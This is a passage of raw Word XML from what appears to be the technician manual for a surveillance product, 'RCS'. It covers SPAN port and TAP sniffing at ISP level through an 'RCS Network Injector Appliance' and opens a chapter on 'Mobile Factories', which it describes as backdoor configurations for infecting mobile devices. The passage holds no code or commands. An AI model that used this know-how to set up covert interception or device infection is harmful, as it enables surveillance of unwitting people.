        <w:rPr>
          <w:b/>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Switch Port Analyzer (SPAN) port</w:t>
      </w:r>
      <w:r w:rsidRPr="00F86DE5">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, also known as a mirror port. An analysis device can then be attached to the SPAN port to access network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="00753B35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00753B35" w:rsidRPr="00753B35" w:rsidRDefault="00753B35" w:rsidP="00753B35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00753B35" w:rsidRDefault="00753B35" w:rsidP="00753B35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7.3 SPAN Port Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753B35" w:rsidRDefault="00753B35" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="00F86DE5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3225600" cy="2520000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="225" name="Immagine 225" descr="http://www.networkinstruments.com/assets/img/pics/taps/t-vs-s-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01" descr="http://www.networkinstruments.com/assets/img/pics/taps/t-vs-s-tap.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25600" cy="2520000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="00F86DE5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRPr="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="00F86DE5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRPr="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="00F86DE5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F86DE5">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00A60944">
        <w:rPr>
          <w:b/>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TAP (Test Access Point)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F86DE5">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a passive splitting mechanism installed between a ‘device of interest’ and the network. TAPs transmit both the send and receive data streams simultaneously on separate dedicated channels, ensuring all data arrives at the monitoring device in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86DE5" w:rsidRDefault="00F86DE5" w:rsidP="00753B35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00753B35" w:rsidRPr="00753B35" w:rsidRDefault="00753B35" w:rsidP="00753B35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00753B35" w:rsidRDefault="00753B35" w:rsidP="00753B35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7.4 TAP Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694B83" w:rsidRDefault="00694B83" w:rsidP="00753B35">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00753B35" w:rsidRDefault="00753B35">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00120B87" w:rsidRDefault="00120B87" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>image</w:t>
      </w:r>
      <w:r w:rsidR="00A83693">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> below shows </w:t>
      </w:r>
      <w:r w:rsidR="00502A4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a typical network layout </w:t>
      </w:r>
      <w:r w:rsidR="002B7DFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r w:rsidR="00502A4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ISP </w:t>
      </w:r>
      <w:r w:rsidR="002B7DFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">level that routes the entire network traffic from an </w:t>
      </w:r>
      <w:r w:rsidR="00502A4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Switch to the </w:t>
      </w:r>
      <w:r w:rsidR="0045719E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RCS </w:t>
      </w:r>
      <w:r w:rsidR="00502A4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Injector Appliance through </w:t>
      </w:r>
      <w:r w:rsidR="002B7DFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00502A4C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SPAN port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="002E25B4">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662"/>
        <w:gridCol w:w="1411"/>
      </w:tblGrid>
      <w:tr w:rsidR="00502A4C" w:rsidTr="00502A4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="002E25B4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="002E25B4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33BCB74C" wp14:editId="69D0B274">
                  <wp:extent cx="3600000" cy="2588571"/>
                  <wp:effectExtent l="0" t="0" r="635" b="254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00000" cy="2588571"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="00502A4C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00502A4C" w:rsidRPr="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="00502A4C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="0045719E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00694B83">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="0045719E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00694B83">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RCS Network Injector Appliance SPAN Port Sniffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="002E25B4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694B83" w:rsidRDefault="00694B83" w:rsidP="002E25B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006033C3" w:rsidRDefault="006033C3" w:rsidP="006033C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A4237">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">image below shows a typical network layout at ISP level that routes the entire network traffic from an Access Switch to the </w:t>
      </w:r>
      <w:r w:rsidR="0045719E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RCS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Injector Appliance through a TAP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="00502A4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662"/>
        <w:gridCol w:w="1411"/>
      </w:tblGrid>
      <w:tr w:rsidR="00502A4C" w:rsidTr="00551E01">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="00551E01">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00502A4C" w:rsidRDefault="00694B83" w:rsidP="00551E01">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="6495" w:dyaOrig="4020">
                <v:shape id="_x0000_i1067" type="#_x0000_t75" style="width:283.5pt;height:175.5pt" o:ole="">
                  <v:imagedata r:id="rId223" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1067" DrawAspect="Content" ObjectID="_1446455282" r:id="rId224"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="00551E01">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00502A4C" w:rsidRPr="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="00551E01">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="0045719E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00694B83">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="0045719E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00694B83">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">RCS Network Injector Appliance </w:t>
            </w:r>
            <w:r w:rsidR="00BB6581">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TAP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Sniffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1411" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C" w:rsidP="00551E01">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002346EF" w:rsidRDefault="002346EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00502A4C" w:rsidRDefault="00502A4C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00502A4C" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId225"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C87FEC" w:rsidRDefault="00C87FEC" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc372642510"/>
      <w:r w:rsidRPr="00754335">
        <w:lastRenderedPageBreak/>
        <w:t>Mobile Factories Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="009F3493" w:rsidRPr="00754335" w:rsidRDefault="009F3493" w:rsidP="009F3493">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc372642511"/>
      <w:r w:rsidRPr="00754335">
        <w:t>Mobile Factories Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="009F3493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="009F3493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mobile factories allow Technicians to create RCS backdoor configurations for mobile platforms infections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="009F3493">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
        <w:gridCol w:w="268"/>
        <w:gridCol w:w="8499"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F3493" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRPr="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:r>
              <w:object w:dxaOrig="705" w:dyaOrig="1110">
                <v:shape id="_x0000_i1068" type="#_x0000_t75" style="width:31.5pt;height:50.25pt" o:ole="">
                  <v:imagedata r:id="rId226" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1068" DrawAspect="Content" ObjectID="_1446455283" r:id="rId227"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8499" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRPr="00671455" w:rsidRDefault="009F3493" w:rsidP="009F3493">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Mobile Factory</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="009F3493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A Mobile Factory is a backdoor configuration for mobile platforms infection.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRPr="00671455" w:rsidRDefault="009F3493" w:rsidP="009F3493">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>With the same factory it’s possible to infect multiple systems based on multiple mobile platforms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="009F3493">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493" w:rsidP="009F3493">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5092"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F3493" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009F3493" w:rsidRDefault="003A4380" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1233" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:-3.65pt;margin-top:0;width:203.8pt;height:121.9pt;z-index:251827200;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId66" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1233" DrawAspect="Content" ObjectID="_1446455374" r:id="rId228"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRDefault="00E17308" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.1</w:t>
            </w:r>
            <w:r w:rsidR="009F3493">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009F3493" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="009F3493">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="009F3493" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="009F3493">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="009F3493" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="009F3493">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="009F3493" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="009F3493">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidR="009F3493" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Target #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009F3493" w:rsidRPr="00057420" w:rsidRDefault="009F3493" w:rsidP="00332A81">
            <w:pPr>
